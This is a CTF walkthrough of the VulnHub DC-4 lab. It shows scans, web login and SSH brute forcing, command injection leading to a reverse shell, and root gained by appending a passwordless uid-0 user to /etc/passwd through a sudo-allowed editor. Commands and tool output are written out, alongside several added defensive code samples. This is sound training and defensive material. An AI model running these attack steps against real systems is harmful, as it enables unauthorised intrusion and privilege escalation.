[vulnhub] DC:4

Introduction

DC-4's information gathering and web penetration parts are solved directly and crudely; the privilege escalation part mainly tests your information-gathering ability once you are on the box. Overall it is a very easy machine.

Information gathering

┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ sudo nmap -sn 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 14:30 CST
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
MAC Address: 0A:00:27:00:00:08 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00030s latency).
MAC Address: 08:00:27:B1:3D:71 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.112
Host is up (0.00029s latency).
MAC Address: 08:00:27:DA:BB:43 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.144
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.29 seconds

┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.112
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 14:31 CST
Nmap scan report for 192.168.56.112
Host is up (0.0078s latency).
Not shown: 51829 filtered tcp ports (no-response), 13704 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:DA:BB:43 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 36.26 seconds

┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.56.112
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 14:32 CST
Nmap scan report for 192.168.56.112
Host is up (0.0014s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d6057066c27e02f762ce642c001ba25 (RSA)
| 256 e7838cd7bb84f32ee8a25f796f8e1930 (ECDSA)
|_ 256 fd39478a5e58339973739e227f904f4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
MAC Address: 08:00:27:DA:BB:43 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.80 seconds

┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ sudo nmap --script=vuln 192.168.56.112
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 14:34 CST
Nmap scan report for 192.168.56.112
Host is up (0.014s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.112
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.112:80/
| Form id:
| Form action: login.php
|
| Path: http://192.168.56.112:80/login.php
| Form id:
|_ Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 08:00:27:DA:BB:43 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 78.64 seconds

The full nmap run did not give us much usable information. It mainly tells us that ports 22 and 80 are open and that nginx 1.15.10 is running on port 80.

In the spirit of leaving nothing out, I also ran nikto to see whether any usable vulnerability had been missed.

┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ sudo nikto -h http://192.168.56.112
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.112
+ Target Hostname: 192.168.56.112
+ Target Port: 80
+ Start Time: 2023-06-01 14:34:35 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2023-06-01 14:35:01 (GMT8) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Unfortunately there was nothing, and even more unfortunately, no usable vulnerability turned up for nginx 1.15 either.

Web penetration

Looking at the site

So let's just look at the web page.

[Screenshot: dc4-login]

The page has nothing but a login form.

Run a directory scan to see whether there are other pages.

┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ sudo dirb http://192.168.56.112
[sudo] password for kali:

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Jun 1 14:31:42 2023
URL_BASE: http://192.168.56.112/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.112/ ----
==> DIRECTORY: http://192.168.56.112/css/
==> DIRECTORY: http://192.168.56.112/images/
+ http://192.168.56.112/index.php (CODE:200|SIZE:506)

---- Entering directory: http://192.168.56.112/css/ ----

---- Entering directory: http://192.168.56.112/images/ ----

-----------------
END_TIME: Thu Jun 1 14:31:56 2023
DOWNLOADED: 13836 - FOUND: 1

There are none.

Try again with a different wordlist and file extensions: sudo dirsearch -u 192.168.56.112 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,html,txt,zip

Still no other directories turn up. At this point the only option left is brute force.

Brute force

Use Burp Suite. (I did not use hydra mainly because this page gives no error message on wrong credentials and simply redirects, and I did not know how to tell hydra which responses mean a wrong password.)

[Screenshot: dc4-bp-bf]

A simple brute force; the wordlist I used was 500-worst-passwords from the passwords directory of SecLists.

[Screenshot: dc4-bf-success]

The brute force succeeds; the password is happy. As for why every password after it also returns 200: once a login succeeds, the application stores a logged-in state in the user's session. A subsequent wrong password should overwrite that session with a failed-login state, but the code that does so, although written, is commented out. You can read the exact code in login.php after getting a shell.
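The session behaviour just described is worth seeing end to end, because it is what turns a single correct guess into a run of 200 responses in Burp. The following is an added example written for this post, not code from the DC-4 box or its login.php: a small model of the login handler with the failure branch commented out, next to a hardened version that resets authentication state on every attempt and re-keys the session on success. The username `admin`, the salted PBKDF2 storage and the guess list are assumptions; only the password `happy` comes from the page.

```python
import hashlib
import hmac
import secrets

# Constructed credential store for this demo. "happy" is the password recovered
# on the page; the username "admin" and the salted PBKDF2 storage are assumptions.
_SALT = b"demo-salt"
USERS = {"admin": hashlib.pbkdf2_hmac("sha256", b"happy", _SALT, 50_000)}


def check_password(user, password):
    """Constant-time comparison against the stored derived key."""
    stored = USERS.get(user)
    if stored is None:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 50_000)
    return hmac.compare_digest(stored, candidate)


def login_vulnerable(session, user, password):
    """Models the behaviour the page describes for DC-4's login.php: success marks
    the session as logged in, but the failure branch that should clear it is
    commented out, so once one request in a session succeeds, every later
    request in that session looks logged in."""
    if check_password(user, password):
        session["login"] = True
    # else:
    #     session["login"] = False   # the reset the page says was commented out
    return 200 if session.get("login") else 302   # 302: redirect back to the form


def login_fixed(session, user, password):
    """Hardened version: authentication state is dropped on every attempt and the
    session is re-keyed on success, so a stale login flag cannot survive a failure
    (a real application would clear only the auth-related keys, not the whole dict)."""
    session.clear()
    if check_password(user, password):
        session["id"] = secrets.token_hex(16)     # new session id on privilege change
        session["login"] = True
        return 200
    return 302


def replay(login_fn, guesses, user="admin"):
    """Send a list of guesses through ONE shared session, as Burp Intruder does
    when it reuses the same cookie jar, and return the response status per guess."""
    session = {}
    return [login_fn(session, user, guess) for guess in guesses]


# Constructed guess list: the correct password sits in the middle.
GUESSES = ["123456", "password", "happy", "qwerty", "letmein"]

if __name__ == "__main__":
    print("vulnerable:", replay(login_vulnerable, GUESSES))  # [302, 302, 200, 200, 200]
    print("fixed:     ", replay(login_fixed, GUESSES))       # [302, 302, 200, 302, 302]
```

With the vulnerable handler the two guesses after `happy` still get 200, exactly the pattern in the Intruder screenshot; with the fixed handler only the correct guess does, so a brute-force run can be told apart from its result by status code alone, which is also what makes the attempt visible in web server logs.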

RCE

Logged into the backend.

[Screenshot: dc4-backend]

Clicking into command shows that we can choose a command to execute.

[Screenshot: dc-ce]

That gets us interested: how nice it would be if our own command could be executed here.

Capturing the request shows that the parameter is sent via POST; the backend executes the command and returns its output.

So we write our reverse shell straight into it. (The URL-encoded part is just the familiar pseudo-device reverse shell; it is URL-encoded so that & is not parsed as a parameter separator.)
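Two things in the previous paragraphs deserve a concrete illustration: why a raw `&` in the POST body breaks the payload, and what the "command" page should have done instead of handing the posted value to a shell. The block below is an added example, not code from DC-4: it parses a form body the way a web server does, shows the vulnerable pattern (posted string straight into `shell=True`) for contrast only, and a hardened handler that maps the form value onto a fixed argv list. The option names and commands in `ALLOWED_COMMANDS` are assumptions for the demo.

```python
import subprocess
from urllib.parse import parse_qs

# Allowlist for the "command" page: form value -> fixed argv. Names and commands are
# assumptions for this demo; nothing the client sends is ever handed to a shell.
ALLOWED_COMMANDS = {
    "list_files": ["ls", "-l"],
    "disk_usage": ["df", "-h"],
    "uptime": ["uptime"],
}


def split_form(body):
    """Parse an application/x-www-form-urlencoded body the way the server does.
    A raw '&' in a value starts a new parameter; an encoded '%26' stays inside the
    value, which is why the payload on the page is URL-encoded."""
    return parse_qs(body, keep_blank_values=True)


def run_vulnerable(radio):
    """Pattern the page describes for the command page: the posted value goes to a
    shell, so separators and substitutions in it are interpreted. Kept for contrast."""
    return subprocess.run(radio, shell=True, capture_output=True, text=True).stdout


def resolve_command(radio):
    """Map the posted value onto a fixed argv; anything not on the list is rejected."""
    return ALLOWED_COMMANDS.get(radio)


def run_hardened(radio):
    argv = resolve_command(radio)
    if argv is None:
        raise ValueError(f"command not allowed: {radio!r}")
    # argv list with shell=False: the OS receives exactly these words, no shell parsing.
    return subprocess.run(argv, capture_output=True, text=True, timeout=5).stdout


if __name__ == "__main__":
    print(split_form("radio=ls+-l&submit=Run"))         # raw '&' splits into two parameters
    print(split_form("radio=ls+-l+%26+id&submit=Run"))  # encoded '&' stays in the value
    for choice in ("list_files", "ls -l; id"):
        try:
            print(choice, "->", run_hardened(choice)[:60])
        except ValueError as err:
            print(err)
```

The defensive point is that the form value becomes a dictionary key, never part of a command string, so the question of how `&`, `;` or `|` are encoded no longer matters on the server side. On the detection side, a request whose `radio` value is not one of the expected option names is a cheap and precise thing to alert on.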

[Screenshot: dc4-reverseshell]

We successfully get a reverse shell.

┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ sudo nc -lvp 443
listening on [any] 443 ...
192.168.56.112: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.144] from (UNKNOWN) [192.168.56.112] 37492
bash: cannot set terminal process group (331): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-4:/usr/share/nginx/html$

Privilege escalation

www-data

The shell we have runs as www-data, which has almost no privileges. sudo -l asks for a password we don't know, and the cron jobs hold nothing new, but there is an interesting file with the SUID bit set.

www-data@dc-4:~$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
/home/jim/test.sh

Let's go take a look. Unfortunately it is only SUID for jim, which is of no use. But in jim's home directory we find a backups directory, and inside it a backup of jim's old passwords.

www-data@dc-4:/home/jim$ cd back
cd backups/
www-data@dc-4:/home/jim/backups$ ls -la
ls -la
total 12
drwxr-xr-x 2 jim jim 4096 Apr 7 2019 .
drwxr-xr-x 3 jim jim 4096 Apr 7 2019 ..
-rw-r--r-- 1 jim jim 2047 Apr 7 2019 old-passwords.bak
www-data@dc-4:/home/jim/backups$ cat old-
cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
dragon
......

Might jim's current password be in here? With over 200 entries, trying them one by one is obviously not an option. Port 22 is open, so we brute-force it with hydra.

┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ hydra -l jim -P old-pass ssh://192.168.56.112
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-01 15:16:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 253 login tries (l:1/p:253), ~16 tries per task
[DATA] attacking ssh://192.168.56.112:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 110 to do in 00:01h, 13 active
[STATUS] 105.50 tries/min, 211 tries in 00:02h, 45 to do in 00:01h, 13 active
[22][ssh] host: 192.168.56.112 login: jim password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-01 15:18:50

We find jim's login credentials: jim:jibril04
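A hydra run like the one above leaves a very distinctive trail in the target's auth log: a burst of `Failed password` lines from one source followed by an `Accepted password` for the same account. As an added example (not part of the original post), the block below implements that detection over a constructed auth.log excerpt; the log lines follow the format sshd actually writes, but the timestamps, PIDs and ports are made up for the demo, and the threshold and window values are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt (not from the page) modelled on what sshd writes while
# hydra runs: a burst of failures for jim from one source, then an accepted login.
SAMPLE_LOG = """\
Jun  1 15:16:30 dc-4 sshd[1230]: Connection closed by 192.168.56.144 port 40120 [preauth]
Jun  1 15:16:31 dc-4 sshd[1231]: Failed password for jim from 192.168.56.144 port 40122 ssh2
Jun  1 15:16:32 dc-4 sshd[1233]: Failed password for jim from 192.168.56.144 port 40124 ssh2
Jun  1 15:16:40 dc-4 sshd[1240]: Failed password for root from 192.168.56.1 port 50001 ssh2
Jun  1 15:16:45 dc-4 sshd[1244]: Failed password for jim from 192.168.56.144 port 40130 ssh2
Jun  1 15:17:02 dc-4 sshd[1251]: Failed password for jim from 192.168.56.144 port 40144 ssh2
Jun  1 15:17:21 dc-4 sshd[1260]: Failed password for jim from 192.168.56.144 port 40160 ssh2
Jun  1 15:17:40 dc-4 sshd[1270]: Failed password for jim from 192.168.56.144 port 40175 ssh2
Jun  1 15:18:49 dc-4 sshd[1300]: Accepted password for jim from 192.168.56.144 port 40380 ssh2
"""

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_line(line):
    """Return (timestamp, result, user, ip) for a password auth line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; the 1900 default is fine for differences
    ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window_seconds=300):
    """Flag source IPs with >= threshold failed passwords inside a sliding window and
    record any later accepted login from a flagged IP (the sign the guessing worked)."""
    recent = defaultdict(deque)      # ip -> failure timestamps still inside the window
    report = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        entry = report.setdefault(
            ip, {"failures": 0, "users": set(), "flagged": False, "succeeded_as": []})
        if result == "Failed":
            entry["failures"] += 1
            entry["users"].add(user)
            window = recent[ip]
            window.append(ts)
            while (ts - window[0]).total_seconds() > window_seconds:
                window.popleft()
            if len(window) >= threshold:
                entry["flagged"] = True
        elif entry["flagged"]:
            entry["succeeded_as"].append(user)
    return {ip: e for ip, e in report.items() if e["flagged"]}


if __name__ == "__main__":
    for ip, entry in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(ip, entry)
```

The single root failure from 192.168.56.1 never reaches the threshold and is dropped from the report; the 192.168.56.144 entry shows six failures for `jim` and then a success as `jim`, which is the alert a defender wants to see as "compromised credential", not just "noisy scanner". The same logic also makes the point that `old-passwords.bak` in a world-readable home directory is the real weakness here: the hydra run is only 253 tries because the list was handed to the attacker.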

jim

┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ ssh jim@192.168.56.112
The authenticity of host '192.168.56.112 (192.168.56.112)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.112' (ED25519) to the list of known hosts.
jim@192.168.56.112's password:
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr 7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$

Logged in successfully.

The motd also tells us there is mail, so let's look at that first.

jim@dc-4:~$ ls
backups mbox test.sh
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

Nothing useful here. Linux should have another mail storage location, but I forgot where; we can simply search for it ourselves. grep out the entries under proc, since the information there is generally of no use.

jim@dc-4:~$ find / -user jim 2>/dev/null | grep -v proc
/run/user/1002
/run/user/1002/gnupg
/run/user/1002/gnupg/S.gpg-agent
/run/user/1002/gnupg/S.gpg-agent.extra
/run/user/1002/gnupg/S.gpg-agent.ssh
/run/user/1002/gnupg/S.gpg-agent.browser
/run/user/1002/systemd
/run/user/1002/systemd/private
/run/user/1002/systemd/notify
/run/user/1002/systemd/transient
/sys/fs/cgroup/systemd/user.slice/user-1002.slice/user@1002.service
/sys/fs/cgroup/systemd/user.slice/user-1002.slice/user@1002.service/tasks
/sys/fs/cgroup/systemd/user.slice/user-1002.slice/user@1002.service/init.scope
/sys/fs/cgroup/systemd/user.slice/user-1002.slice/user@1002.service/init.scope/cgroup.clone_children
/sys/fs/cgroup/systemd/user.slice/user-1002.slice/user@1002.service/init.scope/tasks
/sys/fs/cgroup/systemd/user.slice/user-1002.slice/user@1002.service/init.scope/notify_on_release
/dev/pts/0
/var/mail/jim
/home/jim
/home/jim/mbox
/home/jim/test.sh
/home/jim/new.sh
/home/jim/.profile
/home/jim/backups
/home/jim/backups/old-passwords.bak
/home/jim/.bashrc
/home/jim/.bash_logout
/home/jim/.bash_history

It is at /var/mail/jim

Let's take a look.

jim@dc-4:~$ cat /var/mail/jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles

We find charles's password: ^xHhA&hvim0y

charles

Switch straight to charles.

jim@dc-4:~$ su charles
Password:
charles@dc-4:/home/jim$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee

charles can run teehee without a password. teehee is a Linux text editor, and the method of using it for privilege escalation can be found online: use it to write a user with uid and gid 0 and no password into /etc/passwd. On Linux, if a user has no password in either passwd or shadow, we can log in as that user without a password. So we only need to su to that user to get root.

charles@dc-4:/home/jim$ echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
test::0:0:::/bin/bash
charles@dc-4:/home/jim$ su test
root@dc-4:/home/jim# whoami
root
root@dc-4:/home/jim# id
uid=0(root) gid=0(root) groups=0(root)

Privilege escalation succeeded; checking passwd confirms that this is indeed how it works.

root@dc-4:/home/jim# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Debian-exim:x:108:112::/var/spool/exim4:/bin/false
test::0:0:::/bin/bash
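The explanation of the teehee escalation and the /etc/passwd dump above together describe exactly what a host integrity check should catch: a second uid-0 account, an empty password field, and two accounts sharing a uid. The following is an added example, not code from the box or the post: a small passwd auditor run over the dump as printed on the page. The finding texts and the set of values treated as "shadowed or locked" are assumptions for the demo.

```python
from collections import defaultdict

# /etc/passwd exactly as dumped on DC-4 after the append (copied from the page);
# the last line is the account written with `teehee -a`.
PASSWD_DUMP = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Debian-exim:x:108:112::/var/spool/exim4:/bin/false
test::0:0:::/bin/bash
"""

SHADOWED = {"x", "*", "!", "!!"}   # "look in /etc/shadow" or "locked" markers


def parse_passwd(text):
    """Split passwd text into records; a line without exactly seven fields or with a
    non-numeric uid/gid is kept as malformed so the audit reports it instead of
    silently skipping it."""
    records = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7 or not (fields[2].isdigit() and fields[3].isdigit()):
            records.append({"line": lineno, "user": raw, "malformed": True})
            continue
        user, pw, uid, gid, gecos, home, shell = fields
        records.append({"line": lineno, "user": user, "pw": pw, "uid": int(uid),
                        "gid": int(gid), "home": home, "shell": shell, "malformed": False})
    return records


def audit_passwd(records):
    """Return (account, finding) pairs for the conditions the DC-4 escalation relies on:
    a uid-0 account other than root, an empty password field, and shared uids."""
    findings = []
    owners = defaultdict(list)
    for r in records:
        if r["malformed"]:
            findings.append((r["user"], f"malformed entry on line {r['line']}"))
            continue
        owners[r["uid"]].append(r["user"])
        if r["uid"] == 0 and r["user"] != "root":
            findings.append((r["user"], "uid 0 account that is not root"))
        if r["pw"] == "":
            findings.append((r["user"], "empty password field: no password is asked "
                                        "for if shadow has no entry either"))
        elif r["pw"] not in SHADOWED:
            findings.append((r["user"], "password hash stored in passwd instead of shadow"))
    for uid, names in sorted(owners.items()):
        if len(names) > 1:
            findings.append((",".join(names), f"uid {uid} shared by {len(names)} accounts"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_passwd(parse_passwd(PASSWD_DUMP)):
        print(f"{account}: {finding}")
```

Run against the dump, the `test` line trips all three checks while the original 30 lines are clean, so the same script fed from a file-integrity trigger on /etc/passwd gives a precise alert. The root cause on DC-4 is the sudoers rule itself: any NOPASSWD binary that can append to arbitrary files, whatever it is called, is equivalent to a root shell, and `sudo -l` output for service accounts deserves the same review as the SUID list.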

root

root@dc-4:/home/jim# cd /root
root@dc-4:/root# ls -la
total 28
drwx------ 3 root root 4096 Apr 7 2019 .
drwxr-xr-x 21 root root 4096 Apr 5 2019 ..
-rw------- 1 root root 16 Apr 7 2019 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 976 Apr 6 2019 flag.txt
drwxr-xr-x 2 root root 4096 Apr 6 2019 .nano
-rw-r--r-- 1 root root 148 Aug 18 2015 .profile
root@dc-4:/root# cat flag.txt



888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888


Congratulations!!!

Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Got the flag.